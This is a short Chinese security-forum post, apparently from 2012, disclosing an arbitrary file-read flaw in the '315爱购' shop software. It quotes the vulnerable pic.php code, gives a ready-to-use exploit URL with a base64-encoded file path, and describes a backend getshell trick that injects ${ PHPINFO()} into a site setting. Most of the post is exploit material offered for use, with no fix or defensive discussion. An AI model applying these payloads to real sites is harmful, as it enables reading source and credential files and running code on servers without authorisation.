315爱购程序任意文件源码查看

2012-07-08 03:09:20 14 3223


pic.php
function url_base64_decode($code)

{

        if($code=="")

                return "";

    $code=str_replace("!",'+',$code);

    $code=str_replace(",",'/',$code);

    $str=base64_decode($code);

    return $str;

}

$url=url_base64_decode($_GET["url"]);

//....省略

header("Content-type: image/jpeg");

echo file_get_contents($url);
exp:http://site/pic.php?url=aW5kZXgucGhw
后台GETSHELL
系统基本参数->网站所在目录:->${ PHPINFO()}
类别 Web安全

关于作者

kiss70篇文章750篇回复

kiss
14

评论14次

要评论?请先  登录  或  注册